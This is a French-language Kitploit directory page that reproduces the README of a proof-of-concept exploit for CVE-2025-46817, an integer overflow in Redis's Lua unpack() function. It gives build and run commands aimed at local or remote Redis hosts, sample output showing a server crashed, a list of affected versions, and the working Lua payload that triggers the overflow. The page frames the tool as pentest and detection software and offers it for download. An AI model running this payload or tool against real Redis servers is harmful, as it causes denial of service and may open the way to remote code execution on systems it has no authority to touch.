Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-46817-PoC — Exploit en C pour CVE-2025-46817, une vulnérabilité de dépassement d'entier dans Redis, permettant la détection de crash et une potentielle exécution de code à distance (RCE) via une charge utile Lua unpack(). | Kitploit
Outils/GitHubGitHub/slayerkkkk/cve-2025-46817-poc
Analyse des VulnérabilitésExploitationFuzzingTests d'IntrusionSécurité des Bases de Données
GitHubslayerkkkk/cve-2025-46817-poc

CVE-2025-46817-PoC

Exploit en C pour CVE-2025-46817, une vulnérabilité de dépassement d'entier dans Redis, permettant la détection de crash et une potentielle exécution de code à distance (RCE) via une charge utile Lua unpack().

Voir le dépôt
2il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit de débordement d'entier CVE-2025-46817 pour Redis

Banner Language Platform

Une implémentation légère en C de l'exploit CVE-2025-46817 pour la vulnérabilité de débordement d'entier dans Redis.

🚀 Fonctionnalités

  • Léger : Un seul fichier C, aucune dépendance externe en dehors de hiredis
  • Rapide : Compilation native pour des performances maximales
  • Sortie colorée : Belles couleurs et icônes dans le terminal
  • Détection de crash : Détecte automatiquement les crashs du serveur
  • Vérification de version : Identifie les versions vulnérables de Redis
  • Support du délai d'attente : Délais de connexion configurables

📋 Prérequis

Ubuntu/Debian

root@kitploit:~
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev

CentOS/RHEL

root@kitploit:~
sudo yum install gcc hiredis-devel

macOS

root@kitploit:~
brew install hiredis

🔧 Compilation

root@kitploit:~
gcc -o exploit exploit.c -lhiredis

🎯 Utilisation

Utilisation de base

root@kitploit:~
./exploit -H 127.0.0.1 -P 6379

Cible distante

root@kitploit:~
./exploit -H 192.168.1.100 -P 6379 -t 5

Options de la ligne de commande

root@kitploit:~
-H <hôte>    Hôte du serveur Redis (obligatoire)
-P <port>    Port du serveur Redis (obligatoire)  
-t <délai>   Délai de connexion en secondes (défaut : 10)
-h           Afficher le message d'aide

📊 Exemple de sortie

root@kitploit:~
 ██▓███   █     █░███▄    █  ▄▄▄▄    █    ██   █████▒ █████▒▓█████  ██▀███  
▓██░  ██▒▓█░ █ ░█░██ ▀█   █ ▓█████▄  ██  ▓██▒▓██   ▒▓██   ▒ ▓█   ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██  ▀█ ██▒▒██▒ ▄██▓██  ▒██░▒████ ░▒████ ░ ▒███   ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒  ▐▌██▒▒██░█▀  ▓▓█  ░██░░▓█▒  ░░▓█▒  ░ ▒▓█  ▄ ▒██▀▀█▄  
▒██▒ ░  ░░░██▒██▓▒██░   ▓██░░▓█  ▀█▓▒▒█████▓ ░▒█░   ░▒█░    ░▒████▒░██▓ ▒██▒
▒▓▒░ ░  ░░ ▓░▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒  ▒ ░    ▒ ░    ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░       ▒ ░ ░ ░ ░░   ░ ▒░▒░▒   ░ ░░▒░ ░ ░  ░      ░       ░ ░  ░  ░▒ ░ ▒░
░░         ░   ░    ░   ░ ░  ░    ░  ░░░ ░ ░  ░ ░    ░ ░       ░     ░░   ░ 
             ░            ░  ░         ░                       ░  ░   ░     
                                  ░                                         
                    Outil d'exploitation CVE-2025-46817
                   Débordement d'entier -> Chaîne RCE
                   Accès -> https://pwnbuffer.org/

    Auteur : Slayerkkk
    Cible : Redis <= 8.2.1
    Type : Corruption mémoire -> Exécution de code

ℹ️ Test de connexion à 127.0.0.1:6379...
✅ Connexion réussie
ℹ️ Version de Redis : 8.2.1
❌ VULNÉRABLE - Version <= 8.2.1
ℹ️ Test du scripting Lua...
✅ Lua activé (1+1=2)

🚀 DÉBUT DE L'EXPLOITATION
==================================================
💀 Exécution de la charge utile d'exploitation...
    Charge utile : Débordement d'entier via unpack()
💥 SERVEUR PLANTÉ - Connexion perdue !

📊 RÉSULTAT DE L'EXPLOITATION
==============================
  💥 Statut : planté (2.34s)

💀 EXPLOITATION RÉUSSIE - Le serveur a planté !
   Vulnérabilité CVE-2025-46817 confirmée

🛡️ Versions affectées

  • Redis <= 8.2.1
  • Redis <= 8.0.3
  • Redis <= 7.4.5
  • Redis <= 7.2.10
  • Redis <= 6.2.19

🔍 Détails techniques

Vulnérabilité

L'exploit cible un débordement d'entier dans l'implémentation de la fonction Lua unpack() de Redis (luaB_unpack). Lorsqu'elle est appelée avec des paramètres spécifiques, l'arithmétique sur les entiers signés déborde, ce qui amène Redis à tenter de matérialiser un nombre énorme de valeurs de retour.

Charge utile de l'exploit

root@kitploit:~
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}

Impact

  • Crash du serveur : Déni de service immédiat
  • Corruption mémoire : Corruption du tas/pile
  • RCE potentielle : La corruption mémoire pourrait conduire à l'exécution de code

🎯 Résultats de détection

L'outil rapporte l'un de ces statuts :

  • ✅ survécu : Le serveur a géré la charge utile (probablement corrigé)
  • 💥 planté : Le serveur a planté (vulnérable)
  • ⚠️ délai dépassé : Le serveur a bloqué (probablement vulnérable)
  • ❌ erreur : Une autre erreur s'est produite

🙏 Crédits

Auteur : Slayerkkk
Site web : https://pwnbuffer.org

Télécharger l’outil